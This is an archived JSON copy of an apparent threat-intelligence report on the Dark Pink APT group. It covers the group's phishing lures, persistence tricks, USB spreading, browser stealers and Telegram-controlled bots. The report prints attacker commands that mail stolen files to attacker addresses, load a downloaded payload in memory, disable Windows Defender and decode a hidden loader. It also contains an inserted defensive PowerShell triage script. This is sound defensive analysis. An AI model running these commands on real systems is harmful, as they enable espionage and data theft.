{
	"id": "75745142-ac77-44ad-8f9a-a1e60df2c163",
	"created_at": "2026-04-06T00:08:03.633119Z",
	"updated_at": "2026-04-10T13:12:22.694104Z",
	"deleted_at": null,
	"sha1_hash": "ecc44c1803892dc2a4d04590c41c1245fff5e536",
	"title": "Dark Pink",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1159504,
	"plain_text": "Dark Pink\r\nArchived: 2026-04-02 12:25:17 UTC\r\nSource: https://www.group-ib.com/blog/dark-pink-apt/\r\nAcknowledgements\r\nWe would like to specifically thank Albert Priego, Malware Analyst at Group-IB, for discovering the first Dark Pink attacks and for conducting the initial research into this particular threat actor. His efforts made a major contribution to this blog and to our future research into this APT group.\r\nIntroduction\r\nCountries of the Asia-Pacific region have long been the target of advanced persistent threat (APT) groups. Earlier Group-IB research found that this region has often been a “key arena” of APT activity, and a mixture of nation-state threat actors from China, North Korea, Iran, and Pakistan have been tied to a wave of attacks in the region. More often than not, the primary motive for APT attacks in the Asia-Pacific (APAC) region is not financial gain, but rather espionage.\r\nGroup-IB continuously explores and analyzes the methods, tools, and tactics used by some of the world’s most prominent APT groups, such as APT41. But how can large companies and organizations protect themselves when a new APT group emerges, or when an existing APT group begins to use a completely new toolkit? Enter Dark Pink.\r\nDark Pink is the name given by Group-IB to a new wave of APT attacks that has struck the APAC region. At the present time, Group-IB cannot attribute the campaign to any known threat actor, making it highly likely that Dark Pink is an entirely new APT group. Bearing this in mind, we will refer to Dark Pink as an APT group throughout this text. The name Dark Pink was coined by combining parts of some of the email addresses used by the threat actors during data exfiltration. The APT group has also been termed Saaiwc Group by Chinese cybersecurity researchers.\r\nThere is evidence to suggest that Dark Pink began operations as early as mid-2021, although the group’s activity surged in mid-to-late 2022. 
To date, Group-IB’s Threat Intelligence has uncovered seven confirmed attacks by Dark Pink. The bulk of the attacks were carried out against countries in the APAC region, although the threat actors also targeted one European governmental ministry. The confirmed victims include two military bodies in the Philippines and Malaysia, government agencies in Cambodia, Indonesia and Bosnia and Herzegovina, and a religious organization in Vietnam. Group-IB also became aware of an unsuccessful attack on a European state development agency based in Vietnam. In line with Group-IB’s zero-tolerance policy towards cybercrime, confirmed and potential victims of Dark Pink were issued proactive notifications, and we note that the list of organizations breached by this particular APT group is likely to be longer.\r\nGroup-IB’s early research into Dark Pink has revealed that these threat actors are leveraging a set of tactics, techniques, and procedures rarely utilized by previously known APT groups. They leverage a custom toolkit, featuring TelePowerBot, KamiKakaBot, and the Cucky and Ctealer information stealers (all names dubbed by Group-IB), with the aim of stealing confidential documentation held on the networks of government and military organizations. Of particular note is Dark Pink’s ability to infect even the USB devices attached to compromised computers, and also its ability to gain access to messengers on infected machines. Furthermore, Dark Pink threat actors utilize two core techniques: DLL Side-Loading and executing malicious content triggered by a file type association (Event Triggered Execution: Change Default File Association). The latter technique is rarely seen in the wild.\r\nAt the time of writing, Dark Pink is still active. 
Given that many of the attacks identified by Group-IB researchers took place in the final months of 2022, Group-IB researchers are still in the process of identifying the full scope of the APT attack, and efforts to uncover the origin of this APT group are ongoing. However, we believe that this preliminary research, which will be of great interest to CISOs, heads of cybersecurity teams, SOC analysts and incident response specialists, will go a long way towards raising awareness of the new TTPs utilized by this threat actor and help organizations to take the relevant steps to protect themselves from a potentially devastating APT attack.\r\nKey findings\r\nDark Pink launched seven successful attacks against high-profile targets between June and December 2022.\r\nDark Pink’s first activity, which we tie to a Github account leveraged by the threat actors, was recorded in mid-2021, and the first attack attributable to this APT group took place in June 2022. Their activity peaked in the final three months of 2022, when they launched four confirmed attacks.\r\nDark Pink’s victims are located in five APAC countries (Vietnam, Malaysia, Indonesia, Cambodia, Philippines) and one European country (Bosnia and Herzegovina).\r\nVictims included military bodies, government and development agencies, religious organizations, and a non-profit organization.\r\nOne unsuccessful attack was launched against a European state development agency based in Vietnam in October 2022.\r\nDark Pink APT’s primary goals are to conduct corporate espionage, steal documents, capture the sound from the microphones of infected devices, and exfiltrate data from messengers.\r\nDark Pink’s core initial vector was targeted spear-phishing emails in which the threat actors posed as job applicants. 
There was evidence to suggest that the threat actors behind Dark Pink scanned online job vacancy portals and crafted unique emails to victims that were advertising vacancies.\r\nAlmost all the tools leveraged by the threat actors were custom and self-made, including TelePowerBot and KamiKakaBot, along with the Cucky and Ctealer stealers. During our investigation, we noticed only one public tool: PowerSploit/Get-MicrophoneAudio.\r\nDark Pink APT utilized a rarely seen technique, termed Event Triggered Execution: Change Default File Association, to ensure the launch of the TelePowerBot malware. Another technique leveraged by these particular threat actors was DLL Side-Loading, which they used to avoid detection during initial access.\r\nThe threat actors created a set of PowerShell scripts to carry out communication between victims and the threat actors’ infrastructure, and to facilitate lateral movement and network reconnaissance.\r\nAll communication between infected infrastructure and the threat actors behind Dark Pink is based on the Telegram API.\r\nDark Pink takes on all comers\r\nThe attacks carried out by this particular APT group have been advanced in every sense of the word. They have utilized a sophisticated mixture of custom tools to breach the defenses of multiple government and military organizations. The first attack Group-IB analysts were able to attribute to this APT group was registered against a religious organization in Vietnam in June 2022. However, they appear to have been active well before that, as Group-IB researchers identified a Github account used by these threat actors which showed activity dating back to mid-2021. According to our research, the malware deployed by the threat actors can be instructed to download modules from this particular Github account onto an infected machine. 
Interestingly, the threat actors appear to have used only one Github account for the entire duration of the campaign to date, which could suggest that they have been able to operate without detection for a significant period of time.\r\nFigure 1: Screenshot detailing activity on the Github account attributed to Dark Pink APT in 2021 (above) and 2022 (below)\r\nFollowing the June 2022 attack, Group-IB researchers were unable to attribute any other malicious activity to Dark Pink until the group burst back into life towards the end of the summer, when Group-IB noticed an attack on a Vietnamese non-profit organization in August 2022 bearing all the hallmarks of the June attack. From then on, Group-IB was able to attribute one attack in September, two attacks (one successful, one unsuccessful) in October, two in November, and one in December. Most recently, Group-IB discovered that Dark Pink was able to breach an Indonesian governmental organization on December 8, 2022.\r\nFigure 2: Dark Pink APT timeline and targets\r\nKill Chain\r\nThe sophistication of the Dark Pink campaign is evidenced by its multiple distinct kill chains. The threat actors behind this wave of attacks were able to craft their tools in several programming languages, giving them flexibility as they attempted to breach defense infrastructure and gain persistence on victims’ networks. We will therefore discuss the different steps and stages of these processes, but it is important to note that the bulk of the attacks were based on PowerShell scripts or commands that aimed to establish communication between the infected networks and the threat actors’ infrastructure.\r\nInitial access was achieved by successful spear-phishing emails. 
These messages contained a shortened link directing the victim to download a malicious ISO image, which in one case seen by Group-IB was stored on the public, free-to-use sharing service MediaFire. Once the ISO image was downloaded by the victims, Group-IB identified three distinct infection chains, which we will detail below.\r\nThe first thing that caught our attention was that all communication between the devices of the threat actors and the victims was based on the Telegram API. The custom modules created by the threat actors, TelePowerBot and KamiKakaBot, are designed to read and execute commands via a threat actor-controlled Telegram bot. Interestingly, these modules were developed in different programming languages: TelePowerBot is a PowerShell script, while KamiKakaBot, which includes stealer functionality, is developed in .NET. The threat actors have used the same Telegram bots for a long period of time, as one has been in use since September 2021.\r\nAdditionally, Dark Pink APT utilizes the self-made stealers Ctealer and Cucky to steal victim credentials from web browsers. We will look at each of the above-mentioned tools later in this report. At this stage, we will turn to detailing each step of the infection chain.\r\nInitial access\r\nA large part of the success of Dark Pink was down to the spear-phishing emails used to gain initial access. In one such attack, Group-IB was able to find the original email sent by the threat actors. In this instance, the threat actor posed as a job applicant applying for the position of PR and Communications intern. 
In the email, the threat actor mentions that they found the vacancy on a jobseeker site, which could suggest that the threat actors scan job boards and use this information to create highly relevant phishing emails.\r\nThe emails contain a shortened URL linking to a free-to-use file sharing site, where the victim is presented with the option to download an ISO image that contains all the files needed for the threat actors to infect the victim’s network. During our investigation into Dark Pink, we discovered that the threat actors leveraged several different ISO images, and we also noted that the documents contained in these ISO images varied from case to case. According to the information available to us, we strongly believe that the Dark Pink threat actors craft a unique email for each victim, and we do not discount the possibility that the threat actors send the malicious ISO image to the victim as a direct email attachment.\r\nFigure 3: Screenshot of original spear-phishing email sent by Dark Pink APT noting the storage of the ISO image on a file-sharing site.\r\nThe ISO images sent in the spear-phishing emails contained varying numbers of files. However, there are three types of file found in all of the ISO images sent by the threat actors: a signed executable file, a non-malicious decoy document (e.g. .doc, .pdf, or .jpg), and a malicious DLL file. Given that the email relates to a job opening, one can assume that the victim will first look for the supposed applicant’s resume, which is often sent as an MS Word document. However, in Dark Pink attacks, the threat actors include an .exe file in the ISO image that mimics an MS Word file. 
The file name contains “.doc” and the file carries the MS Word icon, as a means of deceiving the victim into thinking that the file is safe to open.\r\nFigure 4: Screenshot detailing the five files contained in one ISO image seen by Group-IB. Note that the .doc and .dll files are hidden.\r\nShould the victim execute the .exe file first, the malicious DLL file, located in the same folder as the .exe file, will be loaded automatically. This is a technique known as DLL Side-Loading: the signed executable imports a DLL by name, and because the Windows loader searches the application’s own directory before the system directories (unless the name is one of the system’s Known DLLs), a DLL of that name placed next to the executable is the one that gets loaded. The primary function of the DLL is to ensure that the threat actors’ core malware, TelePowerBot, gains persistence. Before the file finishes executing, the decoy document (e.g. a letter or resume) is shown on the victim’s screen.\r\nTrojan execution and persistence\r\nOne of the most interesting discoveries for Group-IB researchers was the process by which TelePowerBot or KamiKakaBot are launched on the victim’s machine. As mentioned previously, the malicious DLL file that contains one of these two pieces of malware can be located inside the ISO image that is sent during spear-phishing campaigns. In one case analyzed by Group-IB, the threat actors used a chain of MS Office documents and leveraged Template Injection, whereby the threat actors insert into the initial document a link to a template document that contains malicious macro code. In two other cases examined by Group-IB researchers, the threat actors behind Dark Pink launched their malware by the DLL Side-Loading technique. In total, we found three different kill chains leveraged by the threat actors, and we will detail them below.\r\nKill Chain 1: All-inclusive ISO\r\nThe first variant of the infection chain results in an ISO image being sent to the victim through spear-phishing emails. 
This ISO image includes a malicious DLL file, which contains TelePowerDropper (name given by Group-IB). The primary goal of this DLL file is to gain persistence for TelePowerBot in the registry of the infected machine. In some cases, the DLL file can also launch the threat actors’ proprietary stealer Ctealer, which parses data from browsers on the victim’s machine and stores it in a local folder. It is important to note that launching any kind of stealer is optional during initial access. Dark Pink can send special commands to download and launch a stealer during all phases of an attack.\r\nFigure 5: Graphic detailing the full scheme of Kill Chain 1\r\nIt is important to note at this stage that the DLL files are packed. When the file is launched, it decrypts itself and passes control to an unpacked version of itself. Additionally, once the DLL file is launched, a mutex will be created. One example of this was: gwgXSznM-Jz92k33A-uRcCCksA-9XAU93r5. Upon completion of this step, a command to start TelePowerBot will be added to autorun. This means that TelePowerBot will be launched each time the user logs into their system. This is facilitated by creating a registry value at the path HKCU\\Environment\\UserInitMprLogonScript. The value is as follows:\r\nforfiles.exe /p %system32% /m notepad.exe /c \"cmd.exe /c whoami \u003e\u003e %appdata%\\a.abcd \u0026\u0026 %appdata%\\a.ab\r\nThe above command uses forfiles.exe, a legitimate Windows utility, as a proxy to run a cmd.exe command line: the standard utility whoami, which prints information about the current user, is executed and its output is appended to a file with the extension .abcd in %appdata%. The command line then invokes that file itself (the captured value is truncated at this point), and Windows resolves how to open an .abcd file through the file association registered for that extension.\r\nAt this point it might not be entirely clear how the next stage, and the launching of TelePowerBot, begins. The key to this answer is the file extension .abcd. 
In short, the threat actors create a file with this extension as part of a technique termed Event Triggered Execution: Change Default File Association. The idea is to register, in the registry key tree, a handler for an extension that Windows does not otherwise recognize, so that any attempt to open a file with that extension runs the attacker’s command instead of failing. Because file associations can be written under HKCU\\SOFTWARE\\Classes, this works without administrative rights and affects only the compromised user. This is detailed in the below screenshot.\r\nFigure 6: Screenshot detailing the command to run upon opening of a file with extension .abcd\r\nThe above screenshot details part of a PowerShell command that is triggered when a file with the specific extension .abcd is opened (here, the file that the logon-script command has just created). The PowerShell commands are stored as base64 and are highly obfuscated. The result of these commands is relatively simple: read a registry key, decrypt, and launch TelePowerBot.\r\nKill Chain 2: Github macros\r\nThe second variation of the infection chain is almost identical to the preceding one. The only thing that differs is the file used in the initial stage. During our analysis, we discovered that the threat actors used commands to automatically download a malicious template document containing TelePowerBot from Github upon opening of the .doc contained in the initial ISO file. Macro code written into this template document then works to ensure persistence for the malware.\r\nFigure 7: Graphic detailing the full scheme of Kill Chain 2\r\nIn this instance, the ISO image sent to the victims contains an MS Word document that leads to the automatic download of a malicious template document, which contains TelePowerBot, from Github. In order to evade antivirus defenses on an infected machine during initial access, the macro code is written into the template document rather than into the document the victim receives. This technique is known as Template Injection. 
The macro contains several forms with fields, and during execution, the values of these form fields are read and written as values to registry keys.\r\nThis trick can help the malware avoid detection by antivirus software, as the document itself does not contain any malicious functionality or code. The coded documents contain forms with several parameters, and the macros contained in these files can read these values and work to ensure persistence of TelePowerBot on the victim’s machine.\r\nFigure 8: Screenshot detailing two forms containing predefined keys and values that are written to the registry by the malicious macro code written into the MS Word file sent to victims\r\nKill Chain 3: X(ML) marks the spot\r\nThe third and final kill chain variant that we will detail is the one used in the most recent Dark Pink attack analyzed by Group-IB, which saw the threat actors breach the network of an Indonesian government agency on December 8, 2022. The ISO image sent to the victim in a spear-phishing email contained decoy documents, a signed legitimate executable, and a malicious DLL named KamiKakaDropper. The primary goal of this infection vector is to persist KamiKakaBot on infected machines. In this kill chain, an XML file is located at the end of the decoy document in encrypted form. The malicious DLL file is, as in Kill Chain 1, launched by the DLL Side-Loading technique. Once the DLL file is launched, the XML file that kicks off the next stage of the kill chain will be decrypted from the decoy document and saved on the infected machine.\r\nFigure 9: Graphic detailing the full scheme of Kill Chain 3\r\nThe XML file contains an MSBuild project that includes an inline task to execute .NET code. To find out more about how this process works, please refer to Microsoft’s documentation on MSBuild inline tasks. 
The logic of the .NET code is simple: launch KamiKakaBot, which itself is located in the XML file (packed and encoded in base64 format). After this file is unpacked, control is passed to KamiKakaBot.\r\nFigure 10: Snippet of code inside the XML file that unpacks and launches KamiKakaBot\r\nThe path to the XML file is passed as an argument upon the launch of MSBuild. The command to run MSBuild is located in the registry value HKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell, which is created during execution of the DLL file. Once this step is completed, MSBuild will run each time the user logs on to the system. In addition, the DLL creates a repeating scheduled task that logs the victim off from the system, presumably so that the next logon re-triggers the Shell value.\r\nReconnaissance and lateral movement\r\nAfter infecting a computer in the victim organization’s network, the next goal for Dark Pink is to collect as much information as possible about the victim’s network infrastructure. From our analysis, we see that the threat actors are interested in the following:\r\noutput of standard utilities, e.g. systeminfo.\r\ninformation from web browsers.\r\ninstalled software, including antivirus solutions.\r\ninformation about connected USB devices and network shares.\r\nThe threat actors also collect a list of network and USB drives that are available for writing, and these are then used for lateral movement. On these drives the original files are hidden from the user and, in place of each, a LNK file (Windows shortcut) is created with a command to launch TelePowerDropper.\r\nOne of the most interesting revelations of our investigation into Dark Pink was how the threat actors carry out lateral movement over USB devices. For this, a new WMI event handler is registered. 
From this point onwards, each time a USB flash drive is plugged into an infected machine, a specific action will be executed that sees TelePowerDropper downloaded and stored on the flash drive. Let’s analyze this process a little deeper.\r\n1. The victim plugs a USB flash drive into the infected device.\r\n2. The WMI event is triggered, resulting in the automatic download of a .ZIP archive from the threat actors’ Github account. There are three files inside this archive: Dism.exe, Dism.sys, and Dismcore.dll. The first of these files is a legitimate file with a valid digital signature. The function of the DLL file is to unpack the original executable from the file Dism.sys.\r\n3. The archive is extracted to the %tmp% folder. The files are then copied to the USB device, where a new folder named “dism” is created. The folder’s attributes are changed to hidden and system.\r\n4. A file named system.bat is created, containing a command to launch Dism.exe.\r\n5. Finally, as many LNK files are created as there are folders on the USB drive. The attributes of each original folder are changed to hidden and system, and a LNK file is created in its place with a command to open the hidden folder in explorer.exe and launch system.bat.\r\nFollowing this process, the user will see LNK files bearing the same names as the folders found on the USB device. Once the user opens such a malicious LNK file, TelePowerDropper will be launched by the DLL Side-Loading technique (the functionality of TelePowerDropper has already been shown in the previous section). As a result, the commands which read a registry key, decrypt, and launch TelePowerBot are then transferred to a new machine. It is important to remember that this approach only works if there is at least one folder on the USB device. This is why we observed different implementations, for example the creation of LNK files in place of .pdf files (not only for folders) on USB devices. 
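The persistence points described for Kill Chains 1 and 3 and the WMI subscription behind the USB spreader all live in the compromised user's own hive or in a namespace that built-in cmdlets can enumerate. The triage script below is an added example written for this page, not Group-IB's code or the threat actors' code. It checks the UserInitMprLogonScript value, per-user file associations whose shell command calls a script host, a per-user Winlogon\Shell override, permanent WMI event subscriptions of the kind used to react to USB insertion, and the Windows Defender preferences that the Set-MpPreference list under Evasion techniques (later in this report) leaves behind. The function names, the shape of the output objects, the regular expression used to call a handler suspicious, and the assumption that the USB trigger is a volume- or disk-related WQL query (the report does not show the exact filter) are this example's own.

```powershell
# Added example (not Group-IB's or Dark Pink's code): per-user triage for the Dark Pink
# artefacts described in this report. Run it as the user whose profile is being examined,
# because the persistence points are all under HKCU. Assumptions are marked in comments.
$ScriptHostPattern = 'powershell|pwsh|cmd\.exe|forfiles|mshta|wscript|cscript|rundll32|regsvr32|msbuild'  # assumption

function New-Finding([string]$Check, [string]$Location, [string]$Detail) {
    [pscustomobject]@{ Check = $Check; Location = $Location; Detail = $Detail }
}

function Get-LogonScriptFinding {
    # Kill Chain 1: the logon script value runs at every interactive logon. Legitimate use is
    # rare, so any value at all is worth a look.
    $key = 'HKCU:\Environment'
    $value = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).UserInitMprLogonScript
    if ($value) { New-Finding 'UserInitMprLogonScript' $key $value }
}

function Get-FileAssociationFinding {
    # Kill Chain 1: a per-user ProgId (e.g. abcdfile) under HKCU\Software\Classes whose shell verb
    # runs a script host. HKCU classes take precedence over HKLM when HKEY_CLASSES_ROOT is
    # assembled, so no admin rights are needed to plant one.
    Get-ChildItem -Path 'HKCU:\Software\Classes' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -notlike '.*' } |
        ForEach-Object {
            Get-ChildItem -LiteralPath "$($_.PSPath)\shell" -Recurse -ErrorAction SilentlyContinue |
                Where-Object { $_.PSChildName -eq 'command' } |
                ForEach-Object {
                    $cmd = (Get-ItemProperty -LiteralPath $_.PSPath -ErrorAction SilentlyContinue).'(default)'
                    if ($cmd -and $cmd -match $ScriptHostPattern) {
                        New-Finding 'FileAssociationHandler' ($_.PSPath -replace '^.*::') $cmd
                    }
                }
        }
}

function Get-WinlogonShellFinding {
    # Kill Chain 3: a Shell value under the per-user Winlogon key replaces explorer.exe for this
    # user only. The machine-wide Shell lives in HKLM, so a per-user value is abnormal on its own.
    $key = 'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $value = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).Shell
    if ($value) { New-Finding 'WinlogonShell' $key $value }
}

function Get-WmiSubscriptionFinding {
    # USB spreader: a permanent WMI subscription is an __EventFilter plus a consumer, bound together,
    # in root\subscription. The report does not show the WQL, so treating any filter that watches
    # volume/disk changes, and any consumer that starts a script host, as suspicious is an assumption.
    $ns = 'root\subscription'
    Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue |
        Where-Object { $_.Query -match 'Win32_VolumeChangeEvent|Win32_LogicalDisk|Win32_DiskDrive|Win32_USB' } |
        ForEach-Object { New-Finding 'WmiEventFilter' $_.Name $_.Query }
    Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
        Where-Object { "$($_.ExecutablePath) $($_.CommandLineTemplate)" -match $ScriptHostPattern } |
        ForEach-Object { New-Finding 'WmiCommandLineConsumer' $_.Name $_.CommandLineTemplate }
    Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -ErrorAction SilentlyContinue |
        ForEach-Object { New-Finding 'WmiActiveScriptConsumer' $_.Name ($_.ScriptText -replace '\s+', ' ') }
}

function Get-DefenderTamperFinding {
    # Evasion techniques: the Set-MpPreference calls listed later in this report leave a state that
    # Get-MpPreference exposes. Only settings that are normally off on a default install are checked:
    # DisableCatchupFullScan, DisableRestorePoint, DisableRemovableDriveScanning and
    # DisableScanningMappedNetworkDrivesForFullScan are True by default on typical builds and so
    # carry no signal on their own.
    if (-not (Get-Command Get-MpPreference -ErrorAction SilentlyContinue)) { return }
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if (-not $pref) { return }
    foreach ($name in 'DisableRealtimeMonitoring', 'DisableBehaviorMonitoring', 'DisableIOAVProtection',
                      'DisableScriptScanning', 'DisableArchiveScanning', 'DisableIntrusionPreventionSystem',
                      'DisableScanningNetworkFiles', 'DisableCatchupQuickScan') {
        if ($pref.$name -eq $true) { New-Finding 'DefenderPreference' $name 'True' }
    }
    # Numeric enum values as reported by Get-MpPreference: MAPSReporting 0 = Disabled,
    # SubmitSamplesConsent 2 = NeverSend, EnableNetworkProtection 2 = AuditMode.
    if ($pref.MAPSReporting -eq 0)           { New-Finding 'DefenderPreference' 'MAPSReporting' 'Disabled' }
    if ($pref.SubmitSamplesConsent -eq 2)    { New-Finding 'DefenderPreference' 'SubmitSamplesConsent' 'NeverSend' }
    if ($pref.EnableNetworkProtection -eq 2) { New-Finding 'DefenderPreference' 'EnableNetworkProtection' 'AuditMode' }
    # PUAProtection 0 and EnableControlledFolderAccess 0 match the attacker's end state but are also
    # the out-of-the-box defaults, so they are reported only as context.
    if ($pref.PUAProtection -eq 0)                { New-Finding 'DefenderPreference (default)' 'PUAProtection' 'Disabled' }
    if ($pref.EnableControlledFolderAccess -eq 0) { New-Finding 'DefenderPreference (default)' 'EnableControlledFolderAccess' 'Disabled' }
}

function Invoke-DarkPinkTriage {
    @(
        Get-LogonScriptFinding
        Get-FileAssociationFinding
        Get-WinlogonShellFinding
        Get-WmiSubscriptionFinding
        Get-DefenderTamperFinding
    )
}

Invoke-DarkPinkTriage | Format-Table -AutoSize -Wrap
```

Each check returns objects rather than printing, so the output can be exported or compared across hosts; an empty result means none of the listed artefacts is present for the current user, not that the host is clean, since other profiles on the machine have their own HKCU hives.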
An example of how this works in more detail is provided in APPENDIX B. The mechanism of creating LNK files in place of the original files is also used for network shares.\r\nData exfiltration\r\nAs is the case with many other attacks of this kind, the threat actors exfiltrate data in ZIP archives. During Dark Pink attacks, all data (lists of files from common network shares, web browser data, documents, etc.) that is to be sent to the threat actors is staged in the $env:tmp\\backuplog folder. However, the collection and sending processes operate separately from one another. When the infected machine is issued a command to retrieve the $env:tmp\\backuplog folder, the files are copied to the $env:tmp\\backuplog1 folder, added to an archive and sent to the threat actors’ Telegram bot. After this step is completed, the $env:tmp\\backuplog1 directory is deleted.\r\nDark Pink threat actors can also leverage their self-made stealers Cucky and Ctealer to draw data from infected machines. The functionality of both of these stealers is the same. They can be used to extract data such as passwords, history, logins, and cookies from web browsers. The stealers themselves do not require any internet connection, as they save the result of execution (stolen data) to files. Both of the stealers can be downloaded from the threat actors’ Github account automatically by commands issued by the malware. An example of the script used to launch Cucky is shown in APPENDIX C.\r\nIn total, Group-IB researchers discovered that Dark Pink exfiltrated files via three separate pathways. The first of these pathways sees the threat actors use Telegram to receive files. As a device is infected, information is collected in a specific folder by the malware and sent via Telegram by a special command. The file types sent to the threat actors are: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf. 
An example of a script that carries out this process can be found in APPENDIX D.\r\nIn addition to Telegram, Group-IB found evidence that the threat actors exfiltrated files via Dropbox. This method is slightly different from the one used to exfiltrate via Telegram, as it involves a series of PowerShell scripts that transfer files from a specific folder to a Dropbox account by performing an HTTP request with a hardcoded token.\r\nOne particular attack discovered by Group-IB came as a particular surprise to us. Despite the device being controlled by commands issued from a threat actor-controlled Telegram channel via Telegram bots, some interesting files were sent via email. An example of this command is shown below.\r\n$filepath=\"$env:tmp/backuplog\";\r\n$cred = New-Object System.Management.Automation.PSCredential (\"lanhuong.jsc@outlook.com\",(ConvertTo-S\r\nSend-MailMessage -To \"blackpink.301@outlook[.]com\" -From \"blackred.113@outlook[.]com\"\r\n -Body \"hello badboy\" -SmtpServer \"smtp-mail.outlook.com\" -Port 587\r\n -Subject \"$env:computername\" -UseSsl -Credential $cred\r\n -Attachments (gci $filepath).fullname\r\nThe list of email addresses used during data exfiltration is shown below:\r\nblackpink.301@outlook[.]com\r\nalibaba.113@outlook[.]com\r\nalibaba.113@outlook[.]com.vn\r\nblackred.113@outlook[.]com\r\nlanhuong.jsc@outlook[.]com\r\nnphuongmai.97@outlook[.]com\r\nAt this stage, Group-IB researchers believe that the exfiltration method of choice depends on the potential restrictions set out in the victim’s network infrastructure.\r\nEvasion techniques\r\nDuring their attacks, the threat actors used an already known technique to bypass User Account Control (UAC) in order to alter the settings of Windows Defender. They did this by abusing an auto-elevating COM interface. 
The methods used are not unique, and different implementations were found in different programming languages.\r\nFigure 11: Screenshot of decompiled executable that allows UAC to be bypassed\r\nThe settings are changed by a special PowerShell script which is received as a command and executed through a .NET application. This application comes in the form of an executable file (as base64) that is automatically downloaded from Github upon infection. The executable does not gain persistence and is never written to disk on the infected system; it is loaded directly into memory from the downloaded base64 string. An example of downloading and launching it is shown below.\r\n[Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).Down\r\n[NETLUA.Main]::BypassUAC(\"powershell\\\", \\\"-c {$command}\")\r\nThe PowerShell command to modify Windows Defender settings is passed as an argument and is shown below:\r\nSet-MpPreference -DisableArchiveScanning $true -ea 0;\r\nSet-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0;\r\nSet-MpPreference -DisableCatchupFullScan $true -Force -ea 0;\r\nSet-MpPreference -DisableCatchupQuickScan $true -Force -ea 0;\r\nSet-MpPreference -DisableIntrusionPreventionSystem $true -Force -ea 0;\r\nSet-MpPreference -DisableIOAVProtection $true -Force -ea 0;\r\nSet-MpPreference -DisableRealtimeMonitoring $true -Force -ea 0;\r\nSet-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0;\r\nSet-MpPreference -DisableRestorePoint $true -Force -ea 0;\r\nSet-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0;\r\nSet-MpPreference -DisableScanningNetworkFiles $true -Force -ea 0;\r\nSet-MpPreference -DisableScriptScanning $true -Force -ea 0;\r\nSet-MpPreference -EnableControlledFolderAccess Disabled -Force -ea 0;\r\nSet-MpPreference -EnableNetworkProtection AuditMode -Force -ea 0;\r\nSet-MpPreference 
-MAPSReporting Disabled -Force -ea 0;\r\nSet-MpPreference -SubmitSamplesConsent NeverSend -Force -ea 0;\r\nSet-MpPreference -PUAProtection Disabled -Force -ea 0\r\nThe PowerShell commands are thus executed via the .NET application, which serves as the privilege-escalation tool.\r\nTools\r\nCucky\r\nCucky is a simple custom stealer developed in .NET. A variety of samples were found during the investigation. The most analyzed versions were packed by Confuser. It does not communicate with the network; collected information is saved in the folder %TEMP%\\backuplog. Cucky is able to draw data such as passwords, history, logins, and cookies from targeted web browsers. Although we do not have any information related to the use of the stolen data, we suppose that it can be used to gain access to email web clients, conduct additional infrastructure reconnaissance based on web history, compile a list of organization employees, distribute malicious attachments, and assess whether the compromised machine is real or virtual.\r\nCucky has the functionality to steal data from the following browsers:\r\nChrome, MS Edge, CocCoc, Chromium, Brave, Atom, Uran, Sputnik, Slimjet, Epic Privacy, Amigo, Vivaldy, Kometa, Comodo, Nichrome, Maxthon, Comodo Dragon, Avast Browser, Yandex Browser.\r\nFigure 12: Screenshot of decompiled Cucky stealer\r\nThe sample found contained the path below to debug information:\r\nC:\\Users\\hoang\\source\\repos\\Cucky\\Cucky\\obj\\Release\\net46\\Cucky.pdb\r\nCtealer\r\nCtealer is an analog of Cucky but developed in C/C++. TelePowerDropper or a special command issued by the threat actors can be used to deploy Ctealer. The working process is very similar to Cucky, as it also saves collected files to the %TEMP%\\backuplog folder. 
Ctealer can draw information from the following web\r\nbrowsers:\r\nChrome, Chromium, MS Edge, Brave, Epic Privacy, Amigo, Vivaldi, Orbitum, Atom, Kometa, Dragon, Torch,\r\nComodo, Slimjet, 360 Browser, Maxthon, K-Melon, Sputnik, Nichrome, CocCoc, Uran, Chromodo, Yandex\r\nBrowser.\r\nThe sample found contained the path below to debug information:\r\nC:\\Users\\build\\source\\repos\\CtealWebCredential\\Release\\CtealWebCredential.pdb\r\nTelePowerBot\r\nAs we have already noted, TelePowerBot will be launched every time a user of an infected machine logs into\r\nthe system. When this happens, a special script will be launched. The script reads the value of another regkey (e.g.\r\nHKCU\\SOFTWARE\\Classes\\abcdfile\\shell\\abcd), which begins decryption and launch of TelePowerBot. The\r\nencryption is based on XOR, where the key is a running counter from 0 to 256. Before decryption, the original\r\npayload will be decoded from base64. The deobfuscated command example is shown below:\r\niex(\r\n [System.Text.Encoding]::UTF8.GetString(\r\n([System.Convert]::FromBase64String(\r\n(gp \"HKCU:\\\\SOFTWARE\\\\Classes\\\\abcdfile\\\\shell\" -Name \"abcd\").\"abcd\") | % -Be\r\n$_ = $_ -bxor $i%256;$i++;$_\r\n}\r\n)\r\n)\r\n) | iex\r\nThe decrypted stage is not final. It is an intermediate stage, also based on PowerShell, and is highly\r\nobfuscated. At this stage, the final script has already been stored in the stager, but it is separated into blocks. From\r\nthese, a base64 string is created, and after decoding, we are left with a ZIP stream. Finally,\r\nTelePowerBot is launched after unzipping.\r\nThis kind of tool communicates with a Telegram channel to receive new tasks from the threat actors. The bot can\r\ncommunicate with various infected devices, and the bot checks for new commands every 60 seconds. 
